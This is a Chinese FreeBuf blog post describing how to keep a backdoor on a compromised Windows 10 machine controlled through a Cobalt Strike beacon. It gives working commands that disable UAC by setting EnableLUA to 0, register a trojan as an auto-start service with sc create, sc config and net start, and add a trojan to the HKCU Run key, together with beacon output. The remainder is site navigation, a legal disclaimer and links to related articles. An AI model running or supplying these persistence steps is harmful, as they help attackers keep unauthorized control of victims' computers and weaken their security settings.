freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

注册表后门持久的思考

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

注册表后门持久的思考
calmness 2020-09-28 19:20:37 271639

准备环境

windows10 虚拟机

Cobalt Strike【这里部署在Windows10上,服务器置于云上】

过程

远程木马控制了windows10虚拟机,利用Cobalt Strike

Cobalt Strike下进入beacon

1601290947_5f71c2c330dbe4e5f2e77.png!small

1601290991_5f71c2ef06f4c29bfbe54.png!small

1601291018_5f71c30a15d4c62439adc.png!small

比较说明【可执行文件留持久后门】

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 的值改为0
把这个值改成0,这样在自己的电脑上操作才是真正的administrators

查询注册表信息

shell reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"

EnableLUA 设置为1

1601291097_5f71c3598954cce35a39d.png!small
EnableLUA 设置为0

1601291138_5f71c3825094841cb6bf0.png!small

1601291184_5f71c3b0956ef2a160793.png!small

beacon> shell sc create "test" binpath= "C:\Users\calmness\Desktop\ceshi.exe"  【填写自己木马路径】
[*] Tasked beacon to run: sc create "test" binpath= "C:\Users\calmness\Desktop\ceshi.exe"
[+] host called home, sent: 94 bytes
[+] received output:
[SC] CreateService 成功
beacon> shell sc description "test" "测试"      【设置服务的描述】
[*] Tasked beacon to run: sc description "test" "测试"
[+] host called home, sent: 59 bytes
[+] received output:
[SC] ChangeServiceConfig2 成功
beacon> shell sc config "test" start= auto   【设置服务自启动】
[*] Tasked beacon to run: sc config "test" start= auto
[+] host called home, sent: 59 bytes
[+] received output:
[SC] ChangeServiceConfig 成功
beacon> shell net start "test"        [启动服务]
[*] Tasked beacon to run: net start "test"
[+] host called home, sent: 47 bytes
[+] received output:

结果上线!!!

或者

直接插入注册表里,成为自启动文件

继续——添加后门生成

shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "calm" /t REG_SZ /d "C:\Users\calmness\calmnexx.exe" /f

重启大法

依旧上线

20200922151816584.png

补充一点:

beacon> shell cmd /k dir

[*] Tasked beacon to run: cmd /k dir

[+] host called home, sent: 41 bytes

[+] received output:

驱动器 C 中的卷没有标签

卷的序列号是 88B7-95BE

C:\Users\calmness\Desktop 的目录

2020/09/21  13:07    <DIR>          .

结束!!!

# web安全
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 calmness 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
mac os 小知识
相关推荐
技术研究 | 绕过WAF的常见Web漏洞利用分析
技术研究 | 绕过WAF的常见Web漏洞利用分析

Web安全

本文以最新版安全狗为例,总结一下我个人掌握的一些绕过WAF进行常见Web漏洞利用的方法。

hahfun

422353围观  · 14收藏  · 114喜欢 2020-11-11

PHP中的“数学悖论”
PHP中的“数学悖论”

Web安全

最近翻看PHP手册的时突然想到的一个点子,今天拿来复现一下觉得特别有趣,借此记录一下

FreeBuf_318889

142901围观 2020-11-10

红队测试之Linux提权小结
红队测试之Linux提权小结

Web安全

权限的提升可以让人“知道”更多的事情,特别是攻击者,一旦提权成功后果不堪设想。

酒仙桥六号部队

625121围观  · 14收藏  · 49喜欢 2020-11-10

Web安全基础-信息收集
Web安全基础-信息收集

Web安全

引言:笔者也是初入渗透测试行业,旨在分享一些自己的心得体会,有不足的地方欢迎大家指正。信息收集信息收集是指通过各种方式获取所需要的信息,以便...

xchecktech

303697围观  · 5收藏  · 86喜欢 2020-11-09

IoT漏洞研究(二)Web服务 原创
IoT漏洞研究(二)Web服务

终端安全

IOT Web常采用开源框架+自研模块的方式,漏洞特点也较为明显。

WoKough

771497围观  · 12收藏  · 29喜欢 2020-11-08

calmness LV.4
专注安全工作,沉淀安全知识
  • 18 文章数
  • 67 关注者
考核-迎检经验深入浅出
2025-02-10
安全服务工程师梳理网络
2025-02-04
数据安全体系建设自我思考
2025-01-11
文章目录
或者